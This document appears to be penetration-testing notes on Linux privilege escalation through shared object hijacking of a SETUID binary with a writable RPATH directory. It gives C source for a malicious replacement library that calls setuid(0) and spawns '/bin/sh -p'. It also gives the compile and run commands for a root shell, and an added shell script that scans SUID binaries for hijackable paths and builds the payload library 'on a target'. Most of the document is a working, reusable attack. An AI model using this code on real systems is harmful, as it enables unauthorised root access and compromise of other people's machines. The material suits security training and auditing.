Shared Object Hijacking

  • Programs and binaries that are still under development (or built in-house) usually link against custom shared libraries, and the build often bakes the library's location into the binary as an RPATH/RUNPATH. If that directory is writable by a low-privileged user, a SETUID binary can be made to load attacker-controlled code.
  • Consider the following SETUID binary:
    • payroll
  • find the shared objects/libraries the binary needs
    • ldd payroll
    • one dependency (libshared.so) is not resolved from a standard location such as /lib or /usr/lib but from a custom directory
  • find out where the binary tells the loader to look for it
    • readelf -d payroll | grep PATH
    • this prints the RPATH/RUNPATH entry written into the binary at link time; the dynamic loader searches these directories for the needed libraries, and unlike LD_LIBRARY_PATH or LD_PRELOAD, which are ignored for SETUID programs, an embedded RPATH/RUNPATH is honoured
  • check our access to the directory named there (/development)
    • we have write access, so we can replace the library the SETUID binary loads
  • find the name of the function the binary imports from that library
    • the loader only complains when it cannot resolve a symbol, so put an unrelated library in place of the custom one and let the error message name the missing function
    • cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
      • copies libc over the custom library: the file now exists, but it does not export the symbols payroll expects
    • ./payroll
      • ./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery
      • now we know our replacement library must export a function named dbquery
  • create the replacement library; save the code below as src.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    /* Must carry exactly the name the loader reported as undefined (dbquery).
     * Whatever arguments the binary passes are simply ignored. */
    void dbquery() {
        printf("Malicious library loaded\n");
        /* payroll is SETUID root, so the effective uid is already 0; setuid(0)
         * makes the real uid 0 as well so the shell cannot drop privileges. */
        setuid(0);
        /* -p keeps the privileged ids even if setuid(0) had not equalised them */
        system("/bin/sh -p");
    }
    
  • When payroll calls dbquery, the function sets our user id to 0 (root) and executes /bin/sh with those privileges preserved.
  • compile it with GCC as a position-independent shared object, writing it to the exact path and file name the binary expects
    • gcc src.c -fPIC -shared -o /development/libshared.so
  • ./payroll
    • the loader resolves dbquery from our library and the binary calls it with an effective uid of 0, so we get a root shell
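As an added example (not part of the original notes), the following POSIX shell script packages the discovery steps above into reusable functions: it parses `readelf -d` output for the RPATH/RUNPATH list, reports which of those directories the current user can write to, lists the symbols a binary imports (`nm -D --undefined-only`, a quicker alternative to the libc-copy trick above), and builds the replacement library for a given symbol name. Only payroll, libshared.so, dbquery and /development come from the notes; the function names and the sample readelf lines in the comments are assumptions.

```sh
#!/bin/sh
# Added example, not code from the original notes: audit a binary for a
# hijackable RPATH/RUNPATH and optionally build the replacement library.
# Function names and the sample readelf output in comments are assumptions.

# Pull the RPATH/RUNPATH search list out of `readelf -d` output read on stdin.
# Input lines look like (constructed sample):
#   0x000000000000001d (RUNPATH)  Library runpath: [/development:/opt/lib]
# Prints one colon-separated list (RPATH and RUNPATH entries joined), or
# nothing when the binary carries neither tag.
parse_runpath() {
    awk '/\((RPATH|RUNPATH)\)/ {
            if (match($0, /\[.*\]/)) {
                p = substr($0, RSTART + 1, RLENGTH - 2)
                out = (out == "") ? p : (out ":" p)
            }
        }
        END { if (out != "") print out }'
}

# Print every directory in a colon-separated search path that exists and is
# writable by the current user. Entries that are missing or not directories
# are skipped (a missing entry is still worth a look: if its parent is
# writable, the directory can simply be created).
writable_dirs() {
    old_ifs=$IFS
    IFS=:
    for d in $1; do
        [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
    done
    IFS=$old_ifs
}

# Symbols the binary imports; the loader must resolve each of them, so the
# replacement library has to export the ones that live in the hijacked
# library. Needs binutils' nm. Version suffixes (name@GLIBC_...) are stripped.
undefined_symbols() {
    nm -D --undefined-only "$1" | awk '{ sub(/@.*/, "", $NF); print $NF }'
}

# Full audit of one binary: report its search path and any writable directory
# in it. Returns 0 only when at least one writable directory was found.
audit_binary() {
    bin=$1
    rp=$(readelf -d "$bin" 2>/dev/null | parse_runpath)
    if [ -z "$rp" ]; then
        echo "$bin: no RPATH/RUNPATH" >&2
        return 1
    fi
    echo "$bin: search path = $rp"
    found=$(writable_dirs "$rp")
    [ -n "$found" ] || return 1
    echo "$found" | sed 's/^/  writable: /'
}

# Build a shared object exporting SYMBOL at OUTPATH, e.g.
#   build_hijack_lib dbquery /development/libshared.so
# The payload mirrors the notes: become uid 0 and spawn a privileged shell.
build_hijack_lib() {
    sym=$1
    out=$2
    dir=$(mktemp -d)
    cat > "$dir/lib.c" <<EOF
#include <stdlib.h>
#include <unistd.h>
void $sym(void) { setuid(0); system("/bin/sh -p"); }
EOF
    gcc -fPIC -shared -o "$out" "$dir/lib.c"
    rc=$?
    rm -rf "$dir"
    return $rc
}

# Typical use on a target (uncomment to run):
# find / -perm -4000 -type f 2>/dev/null | while read -r f; do audit_binary "$f"; done
# undefined_symbols ./payroll
# build_hijack_lib dbquery /development/libshared.so && ./payroll
```

Run the audit as the low-privileged user whose access you are assessing: `test -w` reflects that user's permissions, and as root it succeeds for almost everything, which would make every RPATH look hijackable.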